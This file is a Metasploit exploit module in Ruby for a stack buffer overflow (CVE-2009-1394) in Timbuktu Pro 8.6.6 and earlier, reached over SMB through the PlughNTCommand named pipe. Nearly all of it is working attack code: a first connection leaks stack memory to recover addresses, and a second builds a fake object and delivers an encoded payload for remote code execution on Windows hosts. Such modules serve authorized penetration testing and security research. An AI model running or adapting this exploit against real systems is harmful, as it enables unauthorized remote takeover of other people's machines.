157 lines
4.3 KiB
Ruby
157 lines
4.3 KiB
Ruby
##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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# web site for more information on licensing and terms of use.
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# http://metasploit.com/
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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Rank = GreatRanking
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include Msf::Exploit::Remote::SMB
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow',
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'Description' => %q{
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This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6
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in a pretty novel way.
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This exploit requires two connections. The first connection is used to leak stack data
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using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying
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a large value for this argument it is possible to cause Timbuktu to reply to the initial
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request with leaked stack data. Using this data allows for reliable exploitation of the
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buffer overflow vulnerability.
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Props to Infamous41d for helping in finding this exploitation path.
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The second connection utilizes the data from the data leak to accurately exploit
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the stack based buffer overflow vulnerability.
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TODO:
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hdm suggested using meterpreter's migration capability and restarting the process
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for multishot exploitation.
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},
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'Author' => [ 'bannedit' ],
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'License' => MSF_LICENSE,
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'References' =>
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[
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[ 'CVE', '2009-1394' ],
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[ 'OSVDB', '55436' ],
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[ 'BID', '35496' ],
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[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809' ],
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],
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'DefaultOptions' =>
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{
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'EXITFUNC' => 'process',
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},
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'Payload' =>
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{
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'Space' => 2048,
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},
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'Platform' => 'win',
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'Targets' =>
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[
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# we use a memory leak technique to get the return address
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# tested on Windows XP SP2/SP3 may require a bit more testing
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[ 'Automatic Targeting',
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{
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# ntdll .data (a fairly reliable address)
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# this address should be relatively stable across platforms/SPs
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'Writable' => 0x7C97B0B0 + 0x10 - 0xc
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}
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],
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],
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'Privileged' => true,
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'DisclosureDate' => 'Jun 25 2009',
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'DefaultTarget' => 0))
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end
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# we make two connections this code just wraps the process
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def smb_connection
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connect()
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smb_login()
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print_status("Connecting to \\\\#{datastore['RHOST']}\\PlughNTCommand named pipe")
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pipe = simple.create_pipe('\\PlughNTCommand')
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fid = pipe.file_id
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trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
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return pipe
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end
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def mem_leak
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pipe = smb_connection()
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print_status("Constructing memory leak...")
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writable_addr = target['Writable']
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buf = make_nops(114)
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buf[0] = "3 " # specifies the command
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buf[94] = [writable_addr].pack('V') # this helps us by pass some checks in the code
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buf[98] = [writable_addr].pack('V')
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buf[110] = [0x1ff8].pack('V') # number of bytes to leak
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pipe.write(buf)
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leaked = pipe.read()
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leaked << pipe.read()
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if (leaked.length < 0x1ff8)
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print_error("Error: we did not get back the expected amount of bytes. We got #{leaked.length} bytes")
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pipe.close
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disconnect
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return
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end
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offset = 0x1d64
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stackaddr = leaked[offset, 4].unpack('V')[0]
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bufaddr = stackaddr - 0xcc8
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print_status "Stack address found: stack #{sprintf("0x%x", stackaddr)} buffer #{sprintf("0x%x", bufaddr)}"
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print_status("Closing connection...")
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pipe.close
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disconnect
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return stackaddr, bufaddr
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end
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def exploit
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stackaddr, bufaddr = mem_leak()
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if (stackaddr.nil? || bufaddr.nil? ) # just to be on the safe side
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print_error("Error: memory leak failed")
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return
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end
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pipe = smb_connection()
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buf = make_nops(1280)
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buf[0] = "3 "
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buf[94] = [bufaddr+272].pack('V') # create a fake object
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buf[99] = "\x00"
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buf[256] = [bufaddr+256].pack('V')
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buf[260] = [bufaddr+288].pack('V')
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buf[272] = "\x00"
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buf[512] = payload.encoded
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pipe.write(buf)
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end
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end
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